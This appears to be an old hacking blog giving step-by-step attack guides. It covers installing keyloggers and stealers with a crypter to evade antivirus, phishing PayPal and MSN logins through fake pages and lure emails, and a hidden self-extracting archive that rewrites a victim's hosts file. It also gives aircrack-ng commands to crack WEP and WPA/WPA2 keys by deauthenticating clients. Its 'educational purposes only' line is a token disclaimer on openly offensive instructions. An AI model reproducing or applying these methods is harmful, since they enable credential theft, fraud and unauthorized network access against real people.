Thursday, December 31, 2009

Keylogging And Stealers

This Article should be short as it's easy nowadays to find a keylogger
a good keylogger is ardamax and it's not free so ill post it cracked soon :)
also Istealer 3.0 or 5.0 are good and free ill also post them later
just to break the rock some people faced while setting up a keylogger or Stealer
yes File Transfer Protocol.

The best FTP server for using a keylogger is
its pretty simple and easy and free
if you're using Ardamax create a folder and call it logs and setup the keylogger to send to it

to make servers FUD (Fully Undetected) people use a Crypter which can be bought from computer programmers at Hackhound and other places.


Now that we've finished our course in penetrating Wi-Fi Connections its time to hack with another way of hacking
Let's try Data hacking like personal Data's
so what shall we use?
certainly Phishing Or Desktop Phishing
Phishing :
its a fake page where the victim signs in from and falls in the trap giving you his Personal Data
I'll post a link with paypal and rapidshare Phisher soon
" Here"

okay how to use phisher?
go to some stupid free web hosting website
create some new website
in the website control panel
remove index.html and place it with the phisher and in the same folder put post.php with it
now whenever someone opens that page he will fall for it and enter his account data where you will get it at the same folder in a txt file called "Passwords.txt"
but this trick is old so it sounds stupid to trick someone with it
so find some Url Shortener like and shorten that url
send an email to the victim telling him he'd won 50$ and he have to login to through the link then he gets hacked :)
but a better way for phishing is Desktop Phishing where instead of the victim logging in through the fake page he logins through the normal URL
like but he gets hacked how??
first find a Wampserver and download it
open it
now in the C://wamp/www
put in it the phisher
okay great now to make the bomb the phisher arm
Download hosts at "Here "

Now to get hosts ready
Go to and copy your IP.
Opem "Hosts" file you've downloaded using Notepad.
Search for "[YOUR IP ADDRESS]" and change it to your IP address.
Change"" to ""(or any website you wanna hack)

now let's get the bomb ready to rock!
- Right click on "Hosts.exe" and select "Add to Archive".
- Now, in window, change Archive Format from ".rar" to ".zip".
- Tick "Create SFX Archive". Now, in "Advanced" tab, click "SFX Options".
- Now, in "Path to extract", enter "C:\WINDOWS\system32\drivers\etc" (without inverted commas).
- In "Modes" tab, check "Hide all" and "Overwrite all". Hit OK and again OK.

That's The Phisher Arm
Now, after installing Phisher Arm on computer, whenever victim tries to visit or, he is actually shown our phisher page by his browser and thus we can easily extract and hack paypal or msn password using Desktop Phishing. The hacked msn or paypal password is saved passwords.txt file in your "C:\wamp\www" directory.

Cracking Wpa-psk or Wpa2-psk

Welcome to my guide to crack wpa2-psk and wpa-psk

Follow my Steps Carefully and you will get it worked out

now put the card in monitoring mode by typing
airmon-ng start wlan0
now remember the interface (wlan0,mon0,ath0) depends
okay now let's check the networks around

airodump-ng mon0

wait 2 mins now press Control + Z

Copy the mac Adrress of the AP and channel and so on

now monitor the AP writing all packets to a file

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects
and the 4-way handshake is complete, or deauthenticate an existing
client and thus force it to reassociate. Time is money, so let’s force
the deauthenticate. We need the bssid of the AP (-a) and the mac of a
connected client (-c)

aireplay-ng -0 1 -a (AP mac Address) -c (Client mac address) mon0

now it will deauthinticate a client so when it reconnects you capture the hand-shake

13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
that's how it looks when it works
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
Stop airodump-ng and make sure the files were created properly
From this point forward, you do not need to be anywhere near the
wireless network. All cracking will happen offline, so you can stop
airodump and other processes and even walk away from the AP. In fact, I
would suggest to walk away and find yourself a cosy place where you can
live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on
bruteforcing, and it can take a very very long time. There are 2 ways
of bruteforcing : one that is relatively fast but does not guarantee
success and one that is very slow, but guarantees that you will find
the key at some point in time

The first option is by using a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.

So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng this is the command to use
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.

That’s it

Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :

8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Key.

Welcome to the Art of hacking blog.

In here we will be learning a few means of hacking to serve our personal Purpouses "Warning This Is For educational purposes only"

okay now lets start with hacking starting from setting up a connection with the internet

We will be learning how to Crack Wep Keys And Wpa-psk and Wpa2-psk Keys so be patient and get ready to rock!!

First of All Wep Keys.

Wep Keys can be cracked easily and without any effort as long as you're near to the AP (Acces Point)

First of all you've got to download Backtrack 4 which is a live linux distribution having alot of tools that can serve our needs (Ps: Check at if you're wireless card can go in monitoring mode if not then you cant do this operation)

You can download Backtrack 4 from
Here now its around 1.3 Gbs so dont get Shocked.
after it downloads get an empty Dvd disk and burn the iso to it "If you're burning with nero make it a bootable disk"
now reboot your computer (If you didnt make it a bootable disk find someway to make the Cd-rom the first to boot upon your pc) (Normally by pressing F8 and find it somewhere)
now you're doing great when bt4 cd loads you will find multiple choices just pick No.1
now it will load then you will see something like "root@bt4:" now type "Startx"
okay very good now listen carefully
wait a sec untill it loads then head to the start menu find "Services >> Networking >> Start"
now you can connect with your wireless network through Start menu >> Internet >> Wicd Manager

okay great now the fun begins

Open a new Shell "the small black box tool on the south west corner of the screen"
now you will see "root@bt:"
write airmon-ng start wlan0
wait a second
now you will see something written (monitoring mode enabled on ....")
maybe wlan0 or mon0 or ath0
depends on your card .
now write "airodump-ng "and the interface (mon0 or wlan0 or ath0)
now wait a minute it will show you all the surrounding networks now press "Control+Z" to stop the operation
copy the mac addresse of the AP you want (its in this form 00:11:22:33:44:55 numbers change with letters and other numbers)
also keep in mind the station number
alright now in the desk-top make a new document file save them in it
now back to the shell type
airodump-ng -c (channel no.) -w (file name to save it) --bssid (bssid of the channel or the mac address) the interface (wlan0 , mon0 , ath0)
now its capturing packets you will see the packets under the word "Data" keep watching them while doing the next steps
now open a new shell and type this
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (wlan0 mon0 or ath0)
wait till it finish and do this
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (wlan0 mon0 ath0)
now leave it working and get back to the first shell

open a new shell and keep watching for the data number every 5000 packets write in the new shell

Aircrack-ng (filename-01.cap) where the filename is the one you typed earlier

keep doing this over and over untill it will say
Key Decrypted Successfully [12:24:53:64:7:4:45:]
now remove the ":" and you will get the key use it to connect easily
later i will be posting how to crack Wpa-psk and wpa2-psk